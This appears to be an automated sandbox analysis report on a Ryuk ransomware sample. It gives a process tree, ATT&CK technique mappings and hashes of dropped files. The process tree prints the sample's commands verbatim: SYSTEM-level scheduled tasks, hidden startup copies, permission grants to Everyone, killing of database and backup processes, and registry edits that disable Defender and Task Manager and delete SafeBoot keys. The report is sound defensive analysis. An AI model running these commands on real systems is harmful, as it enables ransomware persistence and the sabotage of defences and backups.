PID 2124 wrote to memory of 3396	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	91
PID 2124 wrote to memory of 3396	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	91
PID 2124 wrote to memory of 716	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	92
PID 2124 wrote to memory of 716	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	92
PID 2124 wrote to memory of 716	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	92
PID 716 wrote to memory of 4428	716	cmd.exe	93
PID 716 wrote to memory of 4428	716	cmd.exe	93
PID 716 wrote to memory of 4428	716	cmd.exe	93
PID 2124 wrote to memory of 116	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	94
PID 2124 wrote to memory of 116	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	94
PID 2124 wrote to memory of 116	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	94
PID 116 wrote to memory of 4504	116	cmd.exe	95
PID 116 wrote to memory of 4504	116	cmd.exe	95
PID 116 wrote to memory of 4504	116	cmd.exe	95
PID 2124 wrote to memory of 1548	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	96
PID 2124 wrote to memory of 1548	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	96
PID 2124 wrote to memory of 1548	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	96
PID 1548 wrote to memory of 4312	1548	cmd.exe	97
PID 1548 wrote to memory of 4312	1548	cmd.exe	97
PID 1548 wrote to memory of 4312	1548	cmd.exe	97
PID 2124 wrote to memory of 792	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	98
PID 2124 wrote to memory of 792	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	98
PID 2124 wrote to memory of 792	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	98
PID 792 wrote to memory of 4000	792	cmd.exe	99
PID 792 wrote to memory of 4000	792	cmd.exe	99
PID 792 wrote to memory of 4000	792	cmd.exe	99
PID 2124 wrote to memory of 3412	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	100
PID 2124 wrote to memory of 3412	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	100
PID 2124 wrote to memory of 3412	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	100
PID 3412 wrote to memory of 4580	3412	cmd.exe	101
PID 3412 wrote to memory of 4580	3412	cmd.exe	101
PID 3412 wrote to memory of 4580	3412	cmd.exe	101
PID 2124 wrote to memory of 5004	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	102
PID 2124 wrote to memory of 5004	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	102
PID 2124 wrote to memory of 5004	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	102
PID 5004 wrote to memory of 4788	5004	cmd.exe	103
PID 5004 wrote to memory of 4788	5004	cmd.exe	103
PID 5004 wrote to memory of 4788	5004	cmd.exe	103
PID 2124 wrote to memory of 4036	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	104
PID 2124 wrote to memory of 4036	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	104
PID 2124 wrote to memory of 4036	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	104
PID 4036 wrote to memory of 5072	4036	cmd.exe	105
PID 4036 wrote to memory of 5072	4036	cmd.exe	105
PID 4036 wrote to memory of 5072	4036	cmd.exe	105
PID 2124 wrote to memory of 4616	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	107
PID 2124 wrote to memory of 4616	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	107
PID 2124 wrote to memory of 4616	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	107
PID 2124 wrote to memory of 3332	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	109
PID 2124 wrote to memory of 3332	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	109
PID 2124 wrote to memory of 3332	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	109
PID 4616 wrote to memory of 4308	4616	cmd.exe	108
PID 4616 wrote to memory of 4308	4616	cmd.exe	108
PID 4616 wrote to memory of 4308	4616	cmd.exe	108
PID 4616 wrote to memory of 1792	4616	cmd.exe	110

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
4504	attrib.exe
4580	attrib.exe
4788	attrib.exe

C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
"C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe"
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2124
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2360
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:2904
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  2⤵
  - Drops startup file
  PID:1484
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  2⤵
  PID:3396
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:716
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
    3⤵
    - Creates scheduled task(s)
    PID:4428
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:116
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
    3⤵
    - Drops startup file
    - Views/modifies file attributes
    PID:4504
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe" /RU SYSTEM /RL HIGHEST /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1548
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe" /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:4312
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe" /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:792
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:4000
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3412
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s ryuk.exe
    3⤵
    - Views/modifies file attributes
    PID:4580
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5004
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s C:\ProgramData\ryuk.exe
    3⤵
    - Views/modifies file attributes
    PID:4788
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4036
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
    3⤵
    PID:5072
  - - C:\Windows\SysWOW64\icacls.exe
      icacls * /grant Everyone:(OI)(CI)F /T /C /Q
      4⤵
      Modifies file permissions
      PID:3476
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4616
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c taskkill /t /f /im sql*
    3⤵
    PID:4308
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /t /f /im sql*
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1428
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /t /im veeam*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1792
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
  2⤵
  PID:3332
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:1636
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
  2⤵
  PID:988
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
  2⤵
  PID:1640
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
  2⤵
  PID:1944
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
  2⤵
  PID:1128
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
  2⤵
  PID:5100
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  PID:708
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:2932
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  PID:4604
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:3472
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
  2⤵
  PID:1536
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
    3⤵
    PID:1764
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
  2⤵
  PID:3876
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
    3⤵
    PID:444

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\RyukReadMe.html

Filesize
152B

MD5
a641bf8ac8307aad57ecab53872e67db

SHA1
6fa8d69a859c34b8e75223ed8f426dbdf3d03df7

SHA256
9383b707c654726704f6968a151b67fa564653e91c8f3a31298b8cb81469d2ce

SHA512
7d32498611e54397ee320ab09380356c3470daf8e45e0a41d550df129027ca7279f14ec2b9f1b33d312ddca7b7f446f1c5689cae83502f4144f5807e39dcf5f4

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\RyukReadMe.txt

Filesize
1KB

MD5
f69127370e1f1aede86e881dd446f6aa

SHA1
65298f80e3b97f59ea45179463ab9c5cc3ee9337

SHA256
da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc

SHA512
5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ryuk.exe

Filesize
767KB

MD5
d2e194259106bca3b42dc8690d340b59

SHA1
edcd63a3125854ed72cb5811f08644a87e265e3b

SHA256
788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc

SHA512
4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

Download Submit
C:\ProgramData\RYUKID

Filesize
8B

MD5
728c12c960ea2380a041740b51a6cc50

SHA1
205d24f54069a0ec5fb3138cf3d0779b1fbb9a00

SHA256
3f7c89c695c99bc7e44a788158e38f88e1627e8e51f235d2f0417321d72601e2

SHA512
0aba8966b4adcf8542f36338d4cb6f92f4dec10f83183560b03c18dee2ec26f9a8fe90a4b6db9c5a477b960445439e8da11028d9af94e0798732a51b3edb899b

Download Submit
C:\ProgramData\RyukReadMe.txt

Filesize
1KB

MD5
f69127370e1f1aede86e881dd446f6aa

SHA1
65298f80e3b97f59ea45179463ab9c5cc3ee9337

SHA256
da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc

SHA512
5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

Download Submit
C:\ProgramData\hrmlog1

Filesize
2KB

MD5
4e473b117f0782626d179384f10f6bed

SHA1
121d543dbd3b3255150be29bdff40d61ac69506f

SHA256
bcf51c0a7753a91156dfe4f5de73896f382d88ac70fa0e87751218275c0064a5

SHA512
555b73a31408b2f3926e1c5677592365318f127bae97413342c3c21521d314039b8932554a07197b8944a1409e4e540b5e73bfc6b1347f4ccf92b46ce0113c1c

Download Submit
C:\ProgramData\hrmlog1

Filesize
2KB

MD5
4e473b117f0782626d179384f10f6bed

SHA1
121d543dbd3b3255150be29bdff40d61ac69506f

SHA256
bcf51c0a7753a91156dfe4f5de73896f382d88ac70fa0e87751218275c0064a5

SHA512
555b73a31408b2f3926e1c5677592365318f127bae97413342c3c21521d314039b8932554a07197b8944a1409e4e540b5e73bfc6b1347f4ccf92b46ce0113c1c

Download Submit
C:\ProgramData\hrmlog1

Filesize
2KB

MD5
4e473b117f0782626d179384f10f6bed

SHA1
121d543dbd3b3255150be29bdff40d61ac69506f

SHA256
bcf51c0a7753a91156dfe4f5de73896f382d88ac70fa0e87751218275c0064a5

SHA512
555b73a31408b2f3926e1c5677592365318f127bae97413342c3c21521d314039b8932554a07197b8944a1409e4e540b5e73bfc6b1347f4ccf92b46ce0113c1c

Download Submit
C:\ProgramData\hrmlog2

Filesize
292B

MD5
72871fdc9229fa4256d991720d2f3d0f

SHA1
ac1d6cd7c5498a9ef4bc4a8b0455a31177bc05ef

SHA256
2c27af8b03f17df5d236e8de2b4710307fb90be2de024cb809a37cc6a2e32ad0

SHA512
f413ebb9df24f98f3d05ac678042f0a9d37d106e2e26c11d11a388c2d2d9891b4820f0e8ed18351903ef96dfd7880c054dce645488cb242650afa3312f0bc234

Download Submit
C:\ProgramData\hrmlog2

Filesize
292B

MD5
72871fdc9229fa4256d991720d2f3d0f

SHA1
ac1d6cd7c5498a9ef4bc4a8b0455a31177bc05ef

SHA256
2c27af8b03f17df5d236e8de2b4710307fb90be2de024cb809a37cc6a2e32ad0

SHA512
f413ebb9df24f98f3d05ac678042f0a9d37d106e2e26c11d11a388c2d2d9891b4820f0e8ed18351903ef96dfd7880c054dce645488cb242650afa3312f0bc234

Download Submit
C:\ProgramData\hrmlog2

Filesize
292B

MD5
72871fdc9229fa4256d991720d2f3d0f

SHA1
ac1d6cd7c5498a9ef4bc4a8b0455a31177bc05ef

SHA256
2c27af8b03f17df5d236e8de2b4710307fb90be2de024cb809a37cc6a2e32ad0

SHA512
f413ebb9df24f98f3d05ac678042f0a9d37d106e2e26c11d11a388c2d2d9891b4820f0e8ed18351903ef96dfd7880c054dce645488cb242650afa3312f0bc234

Download Submit
C:\ProgramData\ryuk.exe

Filesize
767KB

MD5
d2e194259106bca3b42dc8690d340b59

SHA1
edcd63a3125854ed72cb5811f08644a87e265e3b

SHA256
788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc

SHA512
4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

Download Submit
C:\Users\Admin\AppData\Local\Temp\RYUKID

Filesize
8B

MD5
728c12c960ea2380a041740b51a6cc50

SHA1
205d24f54069a0ec5fb3138cf3d0779b1fbb9a00

SHA256
3f7c89c695c99bc7e44a788158e38f88e1627e8e51f235d2f0417321d72601e2

SHA512
0aba8966b4adcf8542f36338d4cb6f92f4dec10f83183560b03c18dee2ec26f9a8fe90a4b6db9c5a477b960445439e8da11028d9af94e0798732a51b3edb899b

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog1

Filesize
2KB

MD5
4e473b117f0782626d179384f10f6bed

SHA1
121d543dbd3b3255150be29bdff40d61ac69506f

SHA256
bcf51c0a7753a91156dfe4f5de73896f382d88ac70fa0e87751218275c0064a5

SHA512
555b73a31408b2f3926e1c5677592365318f127bae97413342c3c21521d314039b8932554a07197b8944a1409e4e540b5e73bfc6b1347f4ccf92b46ce0113c1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog2

Filesize
292B

MD5
72871fdc9229fa4256d991720d2f3d0f

SHA1
ac1d6cd7c5498a9ef4bc4a8b0455a31177bc05ef

SHA256
2c27af8b03f17df5d236e8de2b4710307fb90be2de024cb809a37cc6a2e32ad0

SHA512
f413ebb9df24f98f3d05ac678042f0a9d37d106e2e26c11d11a388c2d2d9891b4820f0e8ed18351903ef96dfd7880c054dce645488cb242650afa3312f0bc234

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

Filesize
767KB

MD5
d2e194259106bca3b42dc8690d340b59

SHA1
edcd63a3125854ed72cb5811f08644a87e265e3b

SHA256
788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc

SHA512
4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

Download Submit